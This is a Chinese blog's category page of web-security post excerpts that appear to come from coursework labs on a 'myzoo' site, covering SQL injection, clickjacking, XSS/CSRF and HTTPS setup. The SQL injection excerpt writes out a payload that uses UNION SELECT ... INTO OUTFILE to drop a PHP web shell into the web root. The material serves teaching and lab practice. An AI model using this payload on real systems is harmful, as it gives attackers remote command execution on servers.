随笔分类 -  web安全

web安全:sql 注入
摘要:sql注入获取webshell寻找sql注入页面,操作数据库的地方向网站写入sql语句' union select 1,2, '<?php system($_GET["cmd"]);?>' into outfile '/var/www/myzoo/cmd.php'发现mysql没有写入权限,于是在a 阅读全文
posted @ 2016-03-07 20:16 ailx10 阅读(263) 评论(0) 推荐(0) 编辑
web安全:click jacking
摘要:点击劫持 click jacking通过iframe加载被攻击网站到黑客自己维护的网站通过z-index叠加和position定位,将2个网站的信息堆叠在一个立体投影面上,通过opacity设置透明度。诱导普通用户点击按钮。 防御:js防御:if (top.location != self.loca 阅读全文
posted @ 2016-03-07 20:14 ailx10 阅读(308) 评论(0) 推荐(0) 编辑
web安全:xss && csrf
摘要:首先在user.php文件中去除黑名单的第一行标签,在白名单中添加<script>E1:csrf攻击zoobarcsrf:cross-site request forgery 跨站伪造请求普通用户登录myzoo网站后,在未退出的状态下,浏览了attack/csrf网站该网站伪造了一份myzoo网站的 阅读全文
posted @ 2016-03-07 20:13 ailx10 阅读(800) 评论(0) 推荐(0) 编辑
web安全:HTTPS
摘要:E1:搭建zoobar网站开启apache服务和mysql服务service apache2 startservice mysql start建立数据库和表mysql->create database myzoo;use myzoo;create table Person(PersonID int 阅读全文
posted @ 2016-03-07 20:08 ailx10 阅读(449) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示